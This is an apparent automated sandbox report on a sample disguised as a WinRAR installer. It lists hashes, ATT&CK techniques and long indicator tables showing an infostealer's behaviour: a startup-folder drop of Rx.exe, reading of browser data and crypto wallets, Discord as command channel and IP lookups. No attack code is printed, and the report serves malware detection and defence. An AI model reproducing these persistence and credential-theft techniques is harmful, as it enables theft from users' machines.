c5b5def1c8882b702b6b25cbd94461c737bc151366d2d9eba5006c04886bfc9a

Resubmissions

03-12-2024 16:06

241203-tj58vsxqfp 3

03-12-2024 15:57

241203-tecezsska1 7

Analysis

max time kernel
410s
max time network
386s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
03-12-2024 15:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

winrar-x64-701.exe
Size

3.8MB
MD5

46c17c999744470b689331f41eab7df1
SHA1

b8a63127df6a87d333061c622220d6d70ed80f7c
SHA256

c5b5def1c8882b702b6b25cbd94461c737bc151366d2d9eba5006c04886bfc9a
SHA512

4b02a3e85b699f62df1b4fe752c4dee08cfabc9b8bb316bc39b854bd5187fc602943a95788ec680c7d3dc2c26ad882e69c0740294bd6cb3b32cdcd165a9441b6
SSDEEP

98304:6NRBOBfKgQIm9EOTqw8vjh9Ac9nUNupK4hVvcF+yHrAr:sR/gmeOqv7Ac9F0kB

Score

7^/10

credential_access discovery persistence privilege_escalation pyinstaller spyware stealer

Malware Config

Signatures

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Rx.exe	Rx.exe

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Downloads MZ/PE file

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
357	discord.com
369	discord.com
374	discord.com
356	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
339	api.ipify.org
340	api.ipify.org

Checks computer location settings 2 TTPs 50 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Silence V2.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

discovery

Process Discovery

T1057

pid	Process
2620	tasklist.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\7-Zip\Lang\id.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ku.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ky.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\gu.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\hi.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\pt-br.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ro.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\uz.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\uk.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ne.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sl.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\uz-cyrl.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ps.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\gu.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ru.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\eu.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\gl.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\zh-cn.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\License.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fr.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fur.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\is.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\uk.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\tt.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ba.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\tk.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ga.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\hr.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\7z.sfx	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\af.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\eo.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\kab.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sq.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\7-zip32.dll	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sr-spc.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ext.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fi.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ug.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ast.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sw.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\tg.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\cy.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fy.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ko.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sr-spl.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\lv.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\7zFM.exe	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\et.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mk.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ta.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\da.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\yo.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\7z.dll	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\io.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\readme.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\en.ttt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\kk.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\bn.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ca.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ms.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sv.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\lt.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\nb.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\bn.txt	7z2409-x64.exe

Executes dropped EXE 64 IoCs

pid	Process
3848	7z2409-x64.exe
4000	7z2409-x64.exe
436	7zG.exe
4556	Silence V2.exe
4636	Rx.exe
3324	Silence V2.exe
4024	Rx.exe
1528	Silence V2.exe
3388	Silence-v2.exe
4408	Silence V2.exe
2708	Silence-v2.exe
3948	Silence V2.exe
3840	Silence-v2.exe
4584	Silence V2.exe
1096	Silence-v2.exe
2640	Silence V2.exe
2068	Silence-v2.exe
4688	Silence V2.exe
4248	Silence-v2.exe
508	Silence V2.exe
1280	Silence-v2.exe
1716	Silence V2.exe
4704	Silence-v2.exe
2848	Silence V2.exe
928	Silence-v2.exe
388	Silence V2.exe
4720	Silence-v2.exe
4776	Silence V2.exe
3356	Silence-v2.exe
4804	Silence V2.exe
1396	Silence-v2.exe
4004	Silence V2.exe
2624	Silence-v2.exe
464	Silence V2.exe
4488	Silence-v2.exe
2636	Silence V2.exe
3180	Silence-v2.exe
1200	Silence V2.exe
4048	Silence-v2.exe
396	Silence V2.exe
4244	Silence-v2.exe
3744	Silence V2.exe
4388	Silence-v2.exe
2524	Silence V2.exe
2008	Silence-v2.exe
976	Silence V2.exe
4412	Silence-v2.exe
1172	Silence V2.exe
392	Silence-v2.exe
1840	Silence V2.exe
2648	Silence-v2.exe
2760	Silence V2.exe
5036	Silence-v2.exe
5020	Silence V2.exe
1144	Silence-v2.exe
3904	Silence V2.exe
692	Silence-v2.exe
2036	Silence V2.exe
3076	Silence-v2.exe
3920	Silence V2.exe
3880	Silence-v2.exe
2624	Silence V2.exe
2296	Silence-v2.exe
2820	Silence V2.exe

Loads dropped DLL 44 IoCs

pid	Process
3424	Process not Found
3424	Process not Found
436	7zG.exe
4024	Rx.exe
4024	Rx.exe
4024	Rx.exe
4024	Rx.exe
4024	Rx.exe
4024	Rx.exe
4024	Rx.exe
4024	Rx.exe
4024	Rx.exe
4024	Rx.exe
4024	Rx.exe
4024	Rx.exe
4024	Rx.exe
4024	Rx.exe
4024	Rx.exe
4024	Rx.exe
4024	Rx.exe
4024	Rx.exe
4024	Rx.exe
4024	Rx.exe
4024	Rx.exe
4024	Rx.exe
4024	Rx.exe
4024	Rx.exe
4024	Rx.exe
4024	Rx.exe
4024	Rx.exe
4024	Rx.exe
4024	Rx.exe
4024	Rx.exe
4024	Rx.exe
4024	Rx.exe
4024	Rx.exe
4024	Rx.exe
4024	Rx.exe
4024	Rx.exe
4024	Rx.exe
4024	Rx.exe
4024	Rx.exe
4024	Rx.exe
4024	Rx.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x0010000000023d89-1722.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7z2409-x64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7z2409-x64.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Enumerates system info in registry 2 TTPs 12 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 42 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension"	7z2409-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip32.dll"	7z2409-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2409-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip	7z2409-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32	7z2409-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll"	7z2409-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2409-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip	7z2409-x64.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	msedge.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension"	7z2409-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}	7z2409-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll"	7z2409-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2409-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip	7z2409-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip	7z2409-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2409-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment"	7z2409-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip	7z2409-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip	7z2409-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip	7z2409-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2409-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip	7z2409-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2409-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension"	7z2409-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip32.dll"	7z2409-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}	7z2409-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2409-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip	7z2409-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32	7z2409-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment"	7z2409-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2409-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment"	7z2409-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip	7z2409-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}	7z2409-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}	7z2409-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2409-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32	7z2409-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension"	7z2409-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32	7z2409-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment"	7z2409-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2409-x64.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 950904.crdownload:SmartScreen	msedge.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs

pid	Process
2624	msedge.exe
2624	msedge.exe
4988	msedge.exe
4988	msedge.exe
628	identity_helper.exe
628	identity_helper.exe
4720	msedge.exe
4720	msedge.exe
1204	msedge.exe
1204	msedge.exe
1900	msedge.exe
1900	msedge.exe
1428	msedge.exe
1428	msedge.exe
4088	identity_helper.exe
4088	identity_helper.exe
3196	msedge.exe
3196	msedge.exe
2488	msedge.exe
2488	msedge.exe
4560	identity_helper.exe
4560	identity_helper.exe
4000	msedge.exe
4000	msedge.exe
3316	msedge.exe
3316	msedge.exe
1376	identity_helper.exe
1376	identity_helper.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4372	OpenWith.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 50 IoCs

pid	Process
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
1428	msedge.exe
1428	msedge.exe
1428	msedge.exe
1428	msedge.exe
1428	msedge.exe
1428	msedge.exe
1428	msedge.exe
1428	msedge.exe
1428	msedge.exe
1428	msedge.exe
1428	msedge.exe
1428	msedge.exe
1428	msedge.exe
1428	msedge.exe
1428	msedge.exe
3316	msedge.exe
3316	msedge.exe
3316	msedge.exe
3316	msedge.exe
3316	msedge.exe
3316	msedge.exe
3316	msedge.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeRestorePrivilege	436	7zG.exe
Token: 35	436	7zG.exe
Token: SeSecurityPrivilege	436	7zG.exe
Token: SeSecurityPrivilege	436	7zG.exe
Token: SeDebugPrivilege	2620	tasklist.exe

Suspicious use of FindShellTrayWindow 64 IoCs

